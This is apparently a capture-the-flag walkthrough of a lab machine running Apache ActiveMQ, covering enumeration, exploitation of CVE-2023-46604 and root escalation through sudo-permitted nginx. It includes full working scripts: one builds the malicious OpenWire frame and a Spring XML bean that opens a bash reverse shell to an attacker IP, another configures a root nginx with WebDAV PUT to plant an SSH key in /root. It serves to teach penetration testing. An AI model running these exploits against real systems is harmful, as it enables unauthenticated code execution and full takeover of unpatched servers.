Enumeration

Nmap

The initial Nmap scan showed the SSH, HTTP, MQTT and ActiveMQ (OpenWire) ports open.

00 - nmapBroker

Web Enumeration

The web console accepted the default credentials “admin:admin”, so I got access to it.

01 - broker admin

Directory Brute Force

Directory brute-forcing found the admin and api paths. The admin page shows the ActiveMQ version.

02 - dirbust

03 - admin page

Exploitation

CVE-2023-46604

Looking up that version turned up a public exploit for CVE-2023-46604, a deserialization flaw in ActiveMQ's OpenWire protocol (the port the broker uses for Java clients, 61616 by default). An unauthenticated client can send an ExceptionResponse frame that names any class together with a string argument, and the broker instantiates that class by reflection. Naming Spring's ClassPathXmlApplicationContext with a URL as the argument makes the broker fetch an XML bean definition from an attacker-controlled web server and execute whatever it declares. Versions before 5.15.16, 5.16.7, 5.17.6 and 5.18.3 are affected. This repo includes a public PoC that uses this to get a reverse shell.

So I updated poc-linux.xml with my IP and port, started a netcat listener and ran the PoC against the target, which returned a reverse shell.

04 - rce go

05 - shell
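The frame the PoC sends and the XML it points at, as an added example (these are not the writeup's commands or the linked repo's code). It assumes the attack host is 10.10.14.5, serving the XML from port 8000 and listening on 4444, and that the target's OpenWire listener is on the default 61616; change these for your own lab. The frame is built byte by byte so the structure the vulnerability abuses is visible.

```shell
#!/bin/sh
# Added example, not the linked repo's PoC. Assumed lab values: attacker host
# 10.10.14.5 serving the XML on port 8000 and listening on 4444; target
# OpenWire port 61616.
set -eu

# Raw byte helpers. POSIX printf understands octal escapes (\037); \x does not
# work everywhere, so every byte goes through byte().
byte() { printf "\\$(printf '%03o' "$1")"; }
be16() { byte $(( ($1 >> 8) & 255 )); byte $(( $1 & 255 )); }
be32() { byte $(( ($1 >> 24) & 255 )); byte $(( ($1 >> 16) & 255 )); be16 "$1"; }
# Java DataOutputStream.writeUTF(): 2-byte big-endian length, then the bytes.
utf()  { be16 "${#1}"; printf '%s' "$1"; }

# One OpenWire frame: a 4-byte size (not counting itself) followed by an
# ExceptionResponse (type 0x1f). The vulnerable unmarshaller reads the
# Throwable as "class name, message" and creates it with
# Class.forName(name).getConstructor(String).newInstance(message), so naming
# ClassPathXmlApplicationContext makes the broker fetch and apply our XML.
build_packet() {
  url="$1"; out="$2"; body="$out.body"
  {
    byte 31      # ExceptionResponse
    be32 0       # commandId
    byte 0       # responseRequired = false
    be32 0       # correlationId
    byte 1       # throwable is present
    utf "org.springframework.context.support.ClassPathXmlApplicationContext"
    utf "$url"
  } > "$body"
  { be32 "$(wc -c < "$body")"; cat "$body"; } > "$out"
  rm -f "$body"
  echo "$out"
}

# The bean definition the broker fetches: a ProcessBuilder started during
# context init, spawning a bash reverse shell. Same shape as poc-linux.xml.
write_spring_xml() {
  out="$1"; lhost="$2"; lport="$3"
  cat > "$out" <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>bash</value>
        <value>-c</value>
        <value>bash -i &gt;&amp; /dev/tcp/$lhost/$lport 0&gt;&amp;1</value>
      </list>
    </constructor-arg>
  </bean>
</beans>
EOF
  echo "$out"
}

# Deliver the frame. The broker sends nothing back; the shell arrives on the
# listener. Not run here: it needs a live target plus the HTTP server and nc.
fire() { nc -w 3 "$1" "${2:-61616}" < "$3"; }

d="${TMPDIR:-/tmp}"
write_spring_xml "$d/poc-linux.xml" 10.10.14.5 4444 >/dev/null
build_packet "http://10.10.14.5:8000/poc-linux.xml" "$d/activemq-46604.bin" >/dev/null
# In $d:  python3 -m http.server 8000   and elsewhere:  nc -lvnp 4444
# then:   fire <target-ip> 61616 "$d/activemq-46604.bin"
```

The fix in the patched versions checks that the named class is actually a Throwable before instantiating it, which is why the same frame is harmless against 5.18.3 and later.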

Got The User

06 - user

Privilege Escalation

sudo -l

Running “sudo -l” showed that the user can run nginx as root via sudo. There is no GTFOBins entry for nginx, but searching the internet turned up this repo.

07 - sudo l

Since sudo runs nginx as root, I can start it with my own config that serves / as root with WebDAV PUT enabled, upload an SSH public key to /root/.ssh/authorized_keys and log in as root.

08 - nginx

09 - root
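One way to carry out that step, as an added example rather than the writeup's or the linked repo's commands. It assumes the sudo rule permits `sudo nginx -c <file>` without a password, that the target's nginx was built with ngx_http_dav_module, that port 1337 is free on the target, and that your public key has already been copied there as ./id_ed25519.pub.

```shell
#!/bin/sh
# Added example, not the writeup's or the linked repo's code. Assumes
# `sudo nginx -c <file>` is allowed (as sudo -l showed), nginx includes
# ngx_http_dav_module, port 1337 is free, and ./id_ed25519.pub is our key.
set -eu

# The master process is root because of sudo; `user root;` keeps the worker
# as root too, so a WebDAV PUT under `root /;` writes files as uid 0.
write_dav_config() {
  conf="$1"; port="${2:-1337}"
  cat > "$conf" <<EOF
user root;
worker_processes 1;
pid /tmp/nginx_pwn.pid;             # do not fight the distro's pid file
error_log /tmp/nginx_pwn.log;
events { worker_connections 16; }
http {
  server {
    listen 127.0.0.1:$port;          # local only; nothing needs to reach it
    root /;
    autoindex on;                    # also lets you browse and read /root
    dav_methods PUT;                 # needs ngx_http_dav_module
    dav_access user:rw group:r all:r; # 0644: sshd StrictModes rejects a
                                     # group/world-writable authorized_keys
    create_full_put_path on;         # creates /root/.ssh if it is missing
  }
}
EOF
  echo "$conf"
}

# Run on the target once the config exists. Not invoked here: needs sudo.
push_key_as_root() {
  conf="$1"; pubkey="$2"; port="${3:-1337}"
  sudo nginx -c "$conf"
  curl -sS -X PUT --data-binary "@$pubkey" \
    "http://127.0.0.1:$port/root/.ssh/authorized_keys"
  # Stop the root nginx again so it is not left listening.
  sudo nginx -c "$conf" -s stop
}

write_dav_config /tmp/pwn.conf 1337 >/dev/null
# push_key_as_root /tmp/pwn.conf ./id_ed25519.pub
# ssh -i id_ed25519 root@<target-ip>
```

The permission line is the part most walkthroughs skip: nginx creates the PUT target with the mode from dav_access, and an authorized_keys that is group- or world-writable is ignored by sshd with the default StrictModes. If you only want the flag, `autoindex on` already lets `curl http://127.0.0.1:1337/root/root.txt` read it without touching SSH.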

Pwned

The machine was pwned.

10 - gg

